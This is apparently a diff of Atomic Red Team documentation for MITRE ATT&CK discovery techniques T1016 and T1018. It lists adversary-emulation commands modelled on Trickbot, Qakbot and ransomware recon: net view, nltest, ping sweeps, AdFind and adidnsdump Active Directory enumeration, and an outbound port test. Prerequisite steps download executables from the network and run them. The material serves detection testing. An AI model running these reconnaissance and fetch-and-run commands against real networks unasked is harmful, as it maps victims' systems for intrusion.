+#### Dependencies: Run with `sh`!

-
-#### Dependencies:  Run with `sh`!
 ##### Description: Check if arp command exists on the machine
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```sh
 if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi;
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```sh
 (which yum && yum -y install net-tools)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y net-tools)
 ```

+### Atomic Test #4: System Network Configuration Discovery (TrickBot Style)

-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - System Network Configuration Discovery (TrickBot Style)
 Identify network configuration information as seen by Trickbot and described here https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/

 Upon successful execution, cmd.exe will spawn `ipconfig /all`, `net config workstation`, `net view /all /domain`, `nltest /domain_trusts`. Output will be via stdout.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `dafaf052-5508-402d-bf77-51e0700c02e2`

-**auto_generated_guid:** dafaf052-5508-402d-bf77-51e0700c02e2
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 ipconfig /all
@@ -167,15 +113,8 @@ net view /all /domain
 nltest /domain_trusts
 ```

+### Atomic Test #5: List Open Egress Ports

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - List Open Egress Ports
 This is to test for what ports are open outbound.  The technique used was taken from the following blog:
 https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-with-allports-exposed/

@@ -183,23 +122,17 @@ Upon successful execution, powershell will read top-128.txt (ports) and contact

 **Supported Platforms:** Windows

+**auto_generated_guid:** `4b467538-f102-491d-ace7-ed487b853bf5`

-**auto_generated_guid:** 4b467538-f102-491d-ace7-ed487b853bf5
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path of file to write port scan results | path | $env:USERPROFILE&#92;Desktop&#92;open-ports.txt|
 | portfile_url | URL to top-128.txt | url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1016/src/top-128.txt|
 | port_file | The path to a text file containing ports to be scanned, one port per line. The default list uses the top 128 ports as defined by Nmap. | path | PathToAtomicsFolder&#92;T1016&#92;src&#92;top-128.txt|

-
-#### Attack Commands: Run with `powershell`! 
-
+#### Attack Commands: Run with `powershell`!

 ```powershell
 $ports = Get-content "#{port_file}"
@@ -230,125 +163,108 @@ $results | Out-File -Encoding ASCII -append $file
 Write-Host $results
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 Remove-Item -ErrorAction ignore "#{output_file}"
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: Test requires #{port_file} to exist
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "#{port_file}") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory (split-path "#{port_file}") -ErrorAction ignore | Out-Null
 Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}"
 ```

+### Atomic Test #6: Adfind - Enumerate Active Directory Subnet Objects

-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - Adfind - Enumerate Active Directory Subnet Objects
 Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Subnet Objects
 reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html

 **Supported Platforms:** Windows

+**auto_generated_guid:** `9bb45dd7-c466-4f93-83a1-be30e56033ee`

-**auto_generated_guid:** 9bb45dd7-c466-4f93-83a1-be30e56033ee
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string | |

-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=subnet) #{optional_args}
 ```


+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
 ```

+### Atomic Test #7: Qakbot Recon

-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - Qakbot Recon
 A list of commands known to be performed by Qakbot for recon purposes

 **Supported Platforms:** Windows

+**auto_generated_guid:** `121de5c6-5818-4868-b8a7-8fd07c455c1b`

-**auto_generated_guid:** 121de5c6-5818-4868-b8a7-8fd07c455c1b
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | recon_commands | File that houses list of commands to be executed | path | PathToAtomicsFolder&#92;T1016&#92;src&#92;qakbot.bat|

-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 "#{recon_commands}"
 ```


+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: File to copy must exist on disk at specified location (#{recon_commands})
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "#{recon_commands}") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory (split-path "#{recon_commands}") -ErrorAction ignore | Out-Null
 Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1016/src/qakbot.bat" -OutFile "#{recon_commands}"
 ```

+### Atomic Test #8: List macOS Firewall Rules

-
-
-<br/>
-<br/>
-
-## Atomic Test #8 - List macOS Firewall Rules
 "This will test if the macOS firewall is enabled and/or show what rules are configured. Must be run with elevated privileges. Upon successful execution, these commands will output various information about the firewall configuration, including status and specific port/protocol blocks or allows. 

 Using `defaults`, additional arguments can be added to see filtered details, such as `globalstate` for global configuration (\"Is it on or off?\"), `firewall` for common application allow rules, and `explicitauths` for specific rules configured by the user. 
@@ -357,54 +273,27 @@ Using `socketfilterfw`, flags such as --getglobalstate or --listapps can be used

 **Supported Platforms:** macOS

+**auto_generated_guid:** `ff1d8c25-2aa4-4f18-a425-fede4a41ee88`

-**auto_generated_guid:** ff1d8c25-2aa4-4f18-a425-fede4a41ee88
-
-
-
-
-
-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)

 ```bash
 sudo defaults read /Library/Preferences/com.apple.alf
 sudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
 ```

+### Atomic Test #9: DNS Server Discovery Using nslookup

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #9 - DNS Server Discovery Using nslookup
 Identify System domain dns controller on an endpoint using nslookup ldap query. This tool is being abused by qakbot malware to gather information on the domain
 controller of the targeted or compromised host. reference https://securelist.com/qakbot-technical-analysis/103931/

 **Supported Platforms:** Windows

+**auto_generated_guid:** `34557863-344a-468f-808b-a1bfb89b4fa9`

-**auto_generated_guid:** 34557863-344a-468f-808b-a1bfb89b4fa9
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%USERDNSDOMAIN%
 ```

-
-
-
-
-
-<br/>
@@ -1,324 +1,203 @@
 # T1018 - Remote System Discovery
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1018)
-<blockquote>

-Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as  [Ping](https://attack.mitre.org/software/S0097), <code>net view</code> using [Net](https://attack.mitre.org/software/S0039), or, on ESXi servers, `esxcli network diag ping`.
+## Description from ATT&CK

-Adversaries may also analyze data from local host files (ex: <code>C:\Windows\System32\Drivers\etc\hosts</code> or <code>/etc/hosts</code>) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment.
+> Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as  [Ping](https://attack.mitre.org/software/S0097), <code>net view</code> using [Net](https://attack.mitre.org/software/S0039), or, on ESXi servers, `esxcli network diag ping`.
+> 
+> Adversaries may also analyze data from local host files (ex: <code>C:\Windows\System32\Drivers\etc\hosts</code> or <code>/etc/hosts</code>) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment.
+> 
+> Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. <code>show cdp neighbors</code>, <code>show arp</code>).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)

-Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. <code>show cdp neighbors</code>, <code>show arp</code>).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)  
-
-
-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1018)

 ## Atomic Tests

- [Atomic Test #1 - Remote System Discovery - net](#atomic-test-1---remote-system-discovery---net)
+- [Atomic Test #1: Remote System Discovery - net](#atomic-test-1-remote-system-discovery---net)
+- [Atomic Test #2: Remote System Discovery - net group Domain Computers](#atomic-test-2-remote-system-discovery---net-group-domain-computers)
+- [Atomic Test #3: Remote System Discovery - nltest](#atomic-test-3-remote-system-discovery---nltest)
+- [Atomic Test #4: Remote System Discovery - ping sweep](#atomic-test-4-remote-system-discovery---ping-sweep)
+- [Atomic Test #5: Remote System Discovery - arp](#atomic-test-5-remote-system-discovery---arp)
+- [Atomic Test #6: Remote System Discovery - arp nix](#atomic-test-6-remote-system-discovery---arp-nix)
+- [Atomic Test #7: Remote System Discovery - sweep](#atomic-test-7-remote-system-discovery---sweep)
+- [Atomic Test #8: Remote System Discovery - nslookup](#atomic-test-8-remote-system-discovery---nslookup)
+- [Atomic Test #9: Remote System Discovery - adidnsdump](#atomic-test-9-remote-system-discovery---adidnsdump)
+- [Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects](#atomic-test-10-adfind---enumerate-active-directory-computer-objects)
+- [Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects](#atomic-test-11-adfind---enumerate-active-directory-domain-controller-objects)
+- [Atomic Test #12: Remote System Discovery - ip neighbour](#atomic-test-12-remote-system-discovery---ip-neighbour)
+- [Atomic Test #13: Remote System Discovery - ip route](#atomic-test-13-remote-system-discovery---ip-route)
+- [Atomic Test #14: Remote System Discovery - netstat](#atomic-test-14-remote-system-discovery---netstat)
+- [Atomic Test #15: Remote System Discovery - ip tcp_metrics](#atomic-test-15-remote-system-discovery---ip-tcp_metrics)
+- [Atomic Test #16: Enumerate domain computers within Active Directory using DirectorySearcher](#atomic-test-16-enumerate-domain-computers-within-active-directory-using-directorysearcher)
+- [Atomic Test #17: Enumerate Active Directory Computers with Get-AdComputer](#atomic-test-17-enumerate-active-directory-computers-with-get-adcomputer)
+- [Atomic Test #18: Enumerate Active Directory Computers with ADSISearcher](#atomic-test-18-enumerate-active-directory-computers-with-adsisearcher)
+- [Atomic Test #19: Get-DomainController with PowerView](#atomic-test-19-get-domaincontroller-with-powerview)
+- [Atomic Test #20: Get-WmiObject to Enumerate Domain Controllers](#atomic-test-20-get-wmiobject-to-enumerate-domain-controllers)
+- [Atomic Test #21: Remote System Discovery - net group Domain Controller](#atomic-test-21-remote-system-discovery---net-group-domain-controller)
+- [Atomic Test #22: Enumerate Remote Hosts with Netscan](#atomic-test-22-enumerate-remote-hosts-with-netscan)

- [Atomic Test #2 - Remote System Discovery - net group Domain Computers](#atomic-test-2---remote-system-discovery---net-group-domain-computers)
+### Atomic Test #1: Remote System Discovery - net

- [Atomic Test #3 - Remote System Discovery - nltest](#atomic-test-3---remote-system-discovery---nltest)
-
- [Atomic Test #4 - Remote System Discovery - ping sweep](#atomic-test-4---remote-system-discovery---ping-sweep)
-
- [Atomic Test #5 - Remote System Discovery - arp](#atomic-test-5---remote-system-discovery---arp)
-
- [Atomic Test #6 - Remote System Discovery - arp nix](#atomic-test-6---remote-system-discovery---arp-nix)
-
- [Atomic Test #7 - Remote System Discovery - sweep](#atomic-test-7---remote-system-discovery---sweep)
-
- [Atomic Test #8 - Remote System Discovery - nslookup](#atomic-test-8---remote-system-discovery---nslookup)
-
- [Atomic Test #9 - Remote System Discovery - adidnsdump](#atomic-test-9---remote-system-discovery---adidnsdump)
-
- [Atomic Test #10 - Adfind - Enumerate Active Directory Computer Objects](#atomic-test-10---adfind---enumerate-active-directory-computer-objects)
-
- [Atomic Test #11 - Adfind - Enumerate Active Directory Domain Controller Objects](#atomic-test-11---adfind---enumerate-active-directory-domain-controller-objects)
-
- [Atomic Test #12 - Remote System Discovery - ip neighbour](#atomic-test-12---remote-system-discovery---ip-neighbour)
-
- [Atomic Test #13 - Remote System Discovery - ip route](#atomic-test-13---remote-system-discovery---ip-route)
-
- [Atomic Test #14 - Remote System Discovery - netstat](#atomic-test-14---remote-system-discovery---netstat)
-
- [Atomic Test #15 - Remote System Discovery - ip tcp_metrics](#atomic-test-15---remote-system-discovery---ip-tcp_metrics)
-
- [Atomic Test #16 - Enumerate domain computers within Active Directory using DirectorySearcher](#atomic-test-16---enumerate-domain-computers-within-active-directory-using-directorysearcher)
-
- [Atomic Test #17 - Enumerate Active Directory Computers with Get-AdComputer](#atomic-test-17---enumerate-active-directory-computers-with-get-adcomputer)
-
- [Atomic Test #18 - Enumerate Active Directory Computers with ADSISearcher](#atomic-test-18---enumerate-active-directory-computers-with-adsisearcher)
-
- [Atomic Test #19 - Get-DomainController with PowerView](#atomic-test-19---get-domaincontroller-with-powerview)
-
- [Atomic Test #20 - Get-WmiObject to Enumerate Domain Controllers](#atomic-test-20---get-wmiobject-to-enumerate-domain-controllers)
-
- [Atomic Test #21 - Remote System Discovery - net group Domain Controller](#atomic-test-21---remote-system-discovery---net-group-domain-controller)
-
- [Atomic Test #22 - Enumerate Remote Hosts with Netscan](#atomic-test-22---enumerate-remote-hosts-with-netscan)
-
-
-<br/>
-
-## Atomic Test #1 - Remote System Discovery - net
 Identify remote systems with net.exe.

 Upon successful execution, cmd.exe will execute `net.exe view` and display results of local systems on the network that have file and print sharing enabled.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `85321a9c-897f-4a60-9f20-29788e50bccd`

-**auto_generated_guid:** 85321a9c-897f-4a60-9f20-29788e50bccd
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 net view /domain
 net view
 ```

+### Atomic Test #2: Remote System Discovery - net group Domain Computers

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Remote System Discovery - net group Domain Computers
 Identify remote systems with net.exe querying the Active Directory Domain Computers group.

 Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the "Domain Computers" group. Output will be via stdout.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `f1bf6c8f-9016-4edf-aff9-80b65f5d711f`

-**auto_generated_guid:** f1bf6c8f-9016-4edf-aff9-80b65f5d711f
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 net group "Domain Computers" /domain
 ```

+### Atomic Test #3: Remote System Discovery - nltest

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Remote System Discovery - nltest
 Identify domain controllers for specified domain.

 Upon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain controllers. Output will be via stdout.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `52ab5108-3f6f-42fb-8ba3-73bc054f22c8`

-**auto_generated_guid:** 52ab5108-3f6f-42fb-8ba3-73bc054f22c8
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | target_domain | Domain to query for domain controllers | string | %userdnsdomain%|

-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 nltest.exe /dclist:#{target_domain}
 ```

+### Atomic Test #4: Remote System Discovery - ping sweep

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Remote System Discovery - ping sweep
 Identify remote systems via ping sweep.

 Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `6db1f57f-d1d5-4223-8a66-55c9c65a9592`

-**auto_generated_guid:** 6db1f57f-d1d5-4223-8a66-55c9c65a9592
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | start_host | Last octet starting value for ping sweep. | string | 1|
 | stop_host | Last octet ending value for ping sweep. | string | 254|
 | subnet | Subnet used for ping sweep. | string | 192.168.1|

-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 for /l %i in (#{start_host},1,#{stop_host}) do ping -n 1 -w 100 #{subnet}.%i
 ```

+### Atomic Test #5: Remote System Discovery - arp

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Remote System Discovery - arp
 Identify remote systems via arp. 

 Upon successful execution, cmd.exe will execute arp to list out the arp cache. Output will be via stdout.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `2d5a61f5-0447-4be4-944a-1f8530ed6574`

-**auto_generated_guid:** 2d5a61f5-0447-4be4-944a-1f8530ed6574
-
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 arp -a
 ```

+### Atomic Test #6: Remote System Discovery - arp nix

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #6 - Remote System Discovery - arp nix
 Identify remote systems via arp.

 Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.

 **Supported Platforms:** Linux, macOS

+**auto_generated_guid:** `acb6b1ff-e2ad-4d64-806c-6c35fe73b951`

-**auto_generated_guid:** acb6b1ff-e2ad-4d64-806c-6c35fe73b951
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
+#### Attack Commands: Run with `sh`!

 ```sh
 arp -a | grep -v '^?'
 ```


+#### Dependencies: Run with `sh`!

-
-#### Dependencies:  Run with `sh`!
 ##### Description: Check if arp command exists on the machine
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```sh
 if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi;
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```sh
 (which yum && yum -y install net-tools)||(which apt-get && apt-get install -y net-tools)
 ```

+### Atomic Test #7: Remote System Discovery - sweep

-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - Remote System Discovery - sweep
 Identify remote systems via ping sweep.

 Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.

 **Supported Platforms:** Linux, macOS

+**auto_generated_guid:** `96db2632-8417-4dbb-b8bb-a8b92ba391de`

-**auto_generated_guid:** 96db2632-8417-4dbb-b8bb-a8b92ba391de
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | start_host | Subnet used for ping sweep. | string | 1|
 | stop_host | Subnet used for ping sweep. | string | 254|
 | subnet | Subnet used for ping sweep. | string | 192.168.1|

-
-#### Attack Commands: Run with `sh`! 
-
+#### Attack Commands: Run with `sh`!

 ```sh
 for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done
 ```

+### Atomic Test #8: Remote System Discovery - nslookup

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #8 - Remote System Discovery - nslookup
 Powershell script that runs nslookup on cmd.exe against the local /24 network of the first network adaptor listed in ipconfig.

 Upon successful execution, powershell will identify the ip range (via ipconfig) and perform a for loop and execute nslookup against that IP range. Output will be via stdout.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `baa01aaa-5e13-45ec-8a0d-e46c93c9760f`

-**auto_generated_guid:** baa01aaa-5e13-45ec-8a0d-e46c93c9760f
-
-
-
-
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

 ```powershell
 $localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]
@@ -329,29 +208,18 @@ $thirdOctet = $pieces[2]
 foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.exe /c nslookup $ip}
 ```

+### Atomic Test #9: Remote System Discovery - adidnsdump

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #9 - Remote System Discovery - adidnsdump
 This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks
 Python 3 and adidnsdump must be installed, use the get_prereq_command's to meet the prerequisites for this test.
 Successful execution of this test will list dns zones in the terminal.

 **Supported Platforms:** Windows

+**auto_generated_guid:** `95e19466-469e-4316-86d2-1dc401b5a959`

-**auto_generated_guid:** 95e19466-469e-4316-86d2-1dc401b5a959
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | user_name | username including domain. | string | domain&#92;user|
@@ -359,297 +227,246 @@ Successful execution of this test will list dns zones in the terminal.
 | host_name | hostname or ip address to connect to. | string | 192.168.1.1|
 | venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;venv_t1018|

-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 "#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
 ```


+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: Computer must have python 3 installed
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
 invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
 Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
 ```
+
 ##### Description: Computer must have venv configured at #{venv_path}
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path -Path "#{venv_path}" ) { exit 0 } else { exit 1 }
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 py -m venv "#{venv_path}"
 ```
+
 ##### Description: adidnsdump must be installed
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Get-Command "#{venv_path}\Scripts\adidnsdump" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 & "#{venv_path}\Scripts\pip.exe" install --no-cache-dir adidnsdump 2>&1 | Out-Null
 ```

+### Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects

-
-
-<br/>
-<br/>
-
-## Atomic Test #10 - Adfind - Enumerate Active Directory Computer Objects
 Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Computer Objects
 reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html

 **Supported Platforms:** Windows

+**auto_generated_guid:** `a889f5be-2d54-4050-bd05-884578748bb4`

-**auto_generated_guid:** a889f5be-2d54-4050-bd05-884578748bb4
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string | |

-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=computer) #{optional_args}
 ```


+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
 ```

+### Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects

-
-
-<br/>
-<br/>
-
-## Atomic Test #11 - Adfind - Enumerate Active Directory Domain Controller Objects
 Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Domain Controller Objects
 reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html

 **Supported Platforms:** Windows

+**auto_generated_guid:** `5838c31e-a0e2-4b9f-b60a-d79d2cb7995e`

-**auto_generated_guid:** 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string | |

-
-#### Attack Commands: Run with `command_prompt`! 
-
+#### Attack Commands: Run with `command_prompt`!

 ```cmd
 "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -sc dclist
 ```


+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
 ```

+### Atomic Test #12: Remote System Discovery - ip neighbour

-
-
-<br/>
-<br/>
-
-## Atomic Test #12 - Remote System Discovery - ip neighbour
 Use the ip neighbour command to display the known link layer (ARP table) addresses for hosts sharing the same network segment.

 **Supported Platforms:** Linux

+**auto_generated_guid:** `158bd4dd-6359-40ab-b13c-285b9ef6fa25`

-**auto_generated_guid:** 158bd4dd-6359-40ab-b13c-285b9ef6fa25
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
+#### Attack Commands: Run with `sh`!

 ```sh
 ip neighbour show
 ```


+#### Dependencies: Run with `sh`!

-
-#### Dependencies:  Run with `sh`!
 ##### Description: Check if ip command exists on the machine
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```sh
 if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```sh
 apt-get install iproute2 -y
 ```

+### Atomic Test #13: Remote System Discovery - ip route

-
-
-<br/>
-<br/>
-
-## Atomic Test #13 - Remote System Discovery - ip route
 Use the ip route command to display the kernels routing tables.

 **Supported Platforms:** Linux

+**auto_generated_guid:** `1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1`

